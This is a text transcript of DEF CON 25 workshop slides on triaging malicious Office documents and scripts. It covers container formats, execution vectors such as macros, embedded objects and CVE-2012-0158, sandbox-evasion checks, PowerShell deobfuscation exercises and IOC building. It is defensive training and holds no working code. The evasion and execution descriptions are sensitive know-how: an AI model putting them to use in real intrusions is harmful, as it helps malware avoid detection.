malware triage - malscripts are the new ek - draft con 25/def con 25 workshops...word (new format)...
TRANSCRIPT
![Page 1: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/1.jpg)
Malware Triage!Malscripts Are The New Exploit Kit
![Page 2: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/2.jpg)
Hello, My Name is:
Sergei Frankoff @herrcore
Sean Wilson @seanmw
![Page 3: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/3.jpg)
WARNING!We use real malware and real exploits in
the workshops. These have been specifically designed to NOT harm your workstation even if you make a mistake.
However, your Anti-Virus and your employer probably don’t know the
difference. Use your own judgement.
![Page 4: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/4.jpg)
What’s the matter, Oracle got you pushing too many pencils?
Using a Virtual Machine is Recommended!
![Page 5: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/5.jpg)
Tools You Will NeedNotepadWe recommend Notepad++ or Sublime.
Web BrowserWe strongly recommend Chrome (you will need the debugger tools).
PythonMost of the local tools we will use are written in Python.
InternetMany of the tools we will use are online and require a good Internet connection.
![Page 6: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/6.jpg)
OPSEC Warning!
By using online tools you will be sharing data with an unknown third party and in some cases with the entire internet.
![Page 7: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/7.jpg)
Malware?01101101 01100001 01101100 01110111 01100001 01110010 01100101 00100000
Malware is just code!
01101001 01110011 00100000 01100011 01101111 01100100 01100101 00100000
![Page 8: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/8.jpg)
Malscript?
A malscript is just a script.
![Page 9: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/9.jpg)
Malware Analysis Triage
What is the delivery
targeting?
Is it malicious?
Suspicious URL
Suspicious E-mail
Intel feed
Do we have exposure?
Security Event
![Page 10: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/10.jpg)
Effective Triage
Triage is effective when malware has been detected
in the delivery phase.
Quick way to answer “Do I have exposure?”
“If yes, then what next?”
(Lockheed Martin’s Intrusion Kill Chain)
![Page 11: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/11.jpg)
Triage Workflow
Malscript analysis
Payload identification
and download
Payload analysis Build IOCs
Container analysis and
extraction
![Page 12: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/12.jpg)
The Scenario
tax_return.doc (92 KB)
We are definitely going to take all your money if you don’t open the attached tax returns and fix your mistakes!
Sincerely,
The IRS (or CRA if you live in Canada)
![Page 13: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/13.jpg)
Containers
Document Metadata
Identify Execution Vector
Container Analysis
![Page 14: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/14.jpg)
Containers Documents
![Page 15: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/15.jpg)
Document TypesType Extensions Magic Bytes
OLE ContainerWord (old format) PowerPoint (old format) Excel (old format) Rich Text Format (RTF)
.doc
.ppt
.xls
.rtf
D0 CF 11 E0 A1 B1 1A E1
7B 5C 72 74 66 31 {rtf1
ZIPWord (new format) PowerPoint (new format) Excel (new format)
.docm .docx
.pptm .pptx
.xlsm .xlsx50 4B 03 04 PK
PDF Portable Document Formats (PDF)
.pdf 25 50 44 46 %PDF
![Page 16: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/16.jpg)
![Page 17: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/17.jpg)
Documents: Legacy Compound File Binary Format
MetaData Storage: root Streams: Summary Streams
Macros Storage: Macros Files: /Macros/*
Embedded Objects Storage: ObjectPool Streams: - ole*
![Page 18: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/18.jpg)
![Page 19: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/19.jpg)
![Page 20: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/20.jpg)
![Page 21: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/21.jpg)
Documents: RTF
Human Readable Text document with markup syntax
Exploits Multiple 1-day exploits
Embedded Objects Storage: ObjectPool Streams: - ole*
RTF
![Page 22: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/22.jpg)
![Page 23: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/23.jpg)
![Page 24: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/24.jpg)
![Page 25: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/25.jpg)
Documents: OOXML
MetaData Path: docProps Files: Core.xml & App.xml Files
Macros Path: App Specific i.e.: word, xl, ppt Files: VBAProject.bin & VBAData.bin files
Embedded Objects Path: ~/embeddings/ Files: - OLEObject{n}.bin
![Page 26: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/26.jpg)
![Page 27: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/27.jpg)
![Page 28: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/28.jpg)
Documents: Code Execution
Macros - Requires User to enable - Relies on triggered events (Document_Open, Document_Close) - Presence of vbaProject.bin or Macros stream (legacy)
Embedded Object - Requires User to Activate the object (Click) - Relies on default event handler to launch embedded object - Contains an embedded OLE Packager Object
Exploit - Requires User to Open Document - Relies on unpatched vulnerabilities (CVE-2012-0158) - Contains shellcode / malformed markup / decoy document
PowerPoint CustomActions - Requires User to Open Slideshow - Uses Custom Action to activate Embedded Object - Contains an embedded OLE Packager Object
![Page 29: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/29.jpg)
DO IT LIVE!
![Page 30: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/30.jpg)
15 MINUTES
Make sure you have the following tools:• OleTools• Notepad
Exercise Steps• Identify the document type• Identify the execution vector (exploit, macro, embedded object, etc)• Extract executed code
*Bonus• Use metadata and OSINT tools to identify related variants
![Page 31: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/31.jpg)
Obfuscation
Anti-Analysis
Identify Entry Point
WScript Analysis (Javascript and VBScript)
![Page 32: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/32.jpg)
Common Script TypesType Extensions Default Handlers
Javascript .js WScript.exe or CScript.exe
VBScript .vbs WScript.exe or CScript.exe
WScript .wsc notepad.exe
![Page 33: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/33.jpg)
OS Interaction: ActiveX
VBS
JS
ActiveX
CreateObject(…)
ActiveX
Object(
…)
Open(…)
Send(…)
Run(…)
ShellExecute(…)
![Page 34: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/34.jpg)
Script Based Sandbox Evasion
Environment - Number of Running Processes - User Name - Recent Files - Program Files List - …
Network - ASN Details - Source IP - Ping as time delay
Anti-Analysis - Specific functionality OO vs Microsoft Office Objects - Obfuscated payloads - Payload launch Arguments
![Page 35: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/35.jpg)
![Page 36: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/36.jpg)
![Page 37: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/37.jpg)
![Page 38: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/38.jpg)
![Page 39: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/39.jpg)
![Page 40: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/40.jpg)
![Page 41: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/41.jpg)
![Page 42: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/42.jpg)
DO IT LIVE!
![Page 43: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/43.jpg)
20 MINUTES
Make sure you have the following tools:• Chrome or IE with debugger console• Notepad
Exercise Steps• Identify the script type• Identify the obfuscation functions and deobfuscate• Identify the anti-analysis techniques• Identify and download the payload (how is this executed)
![Page 44: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/44.jpg)
Execution
Obfuscation
Anti-Analysis
PowerShell Analysis
PS
![Page 45: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/45.jpg)
![Page 46: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/46.jpg)
![Page 47: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/47.jpg)
![Page 48: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/48.jpg)
![Page 49: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/49.jpg)
![Page 50: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/50.jpg)
![Page 51: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/51.jpg)
DO IT LIVE!
![Page 52: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/52.jpg)
20 MINUTES
Make sure you have the following tools:• Python PS decode script• Notepad
Exercise Steps• Identify the obfuscation functions and deobfuscate• Identify the anti-analysis techniques• Identify and download the payload (how is this executed)
*Bonus• Gather as much information from the C2 server as possible
![Page 53: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/53.jpg)
Virus Total
Malwr / Hybrid Analysis
Payload Analysis
![Page 54: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/54.jpg)
![Page 55: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/55.jpg)
![Page 56: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/56.jpg)
![Page 57: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/57.jpg)
![Page 58: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/58.jpg)
Sandbox Magic
A
X B
C
PE Runtime
Win
dow
s AP
I
Network
Filesystem
Registry
Process
Synchronization
Services
Sandbox Process Monitor
![Page 59: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/59.jpg)
![Page 60: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/60.jpg)
![Page 61: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/61.jpg)
![Page 62: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/62.jpg)
![Page 63: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/63.jpg)
![Page 64: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/64.jpg)
![Page 65: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/65.jpg)
DO IT LIVE!
![Page 66: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/66.jpg)
20 MINUTES
Make sure you have the following tools:• https://www.virustotal.com/
https://malwr.com/ • https://www.hybrid-analysis.com/
Exercise Steps• Upload the payload to VirusTotal. Has it been identified?• Upload the payload to Malwr or Hybrid Analysis• Review the following from the sandbox analysis;
• Mutex created• Registry keys created• Network traffic
• What is the purpose of the malware?
*Bonus• Identify a design flaw in the malware that can be used to gather more information from the C2
![Page 67: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/67.jpg)
Identify Pivots
Search for variants
Comparative analysis
Build IOC
Build IOCs
![Page 68: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/68.jpg)
IOC Formats
VS.
We Don’t Teach
Formats!
![Page 69: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/69.jpg)
The Key is Comparative Analysis
Sample #1
Sample #2
Pivot (Attribute)
![Page 70: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/70.jpg)
Static Attributes
EXIF Data
Compiler Artifacts
Easily Modified or Packed Can make poor indicators
Sample Discovery Can work as primary indicators Library and
API Imports
Strings
![Page 71: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/71.jpg)
Dynamic AttributesIn-Memory Strings
Process HandlesMutex
Access / Created Files
Registry Keys
Network Traffic Comparative analysis yields more robust IOCs
![Page 72: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/72.jpg)
Rough Notes Are OK
VS.
![Page 73: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/73.jpg)
Mining OSINT
virusshare.com
![Page 74: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/74.jpg)
Mining Open Data With OAPivot
![Page 75: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/75.jpg)
Acquiring SamplesVirusShare
![Page 76: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/76.jpg)
Comparison ChecklistInitial Sample Pivot Sample A Pivot Sample B
Strings
Exif Data
Imphash
Memory StringsMutex
File Names
Registry Keys
Network Traffic
![Page 77: Malware Triage - Malscripts Are The New EK - Draft CON 25/DEF CON 25 workshops...Word (new format) PowerPoint (new format) Excel (new format).docm .docx .pptm .pptx .xlsm .xlsx 50](https://reader031.vdocuments.net/reader031/viewer/2022022006/5aca55bd7f8b9a6b578d9858/html5/thumbnails/77.jpg)
Storing | Consuming | Sharing MISP
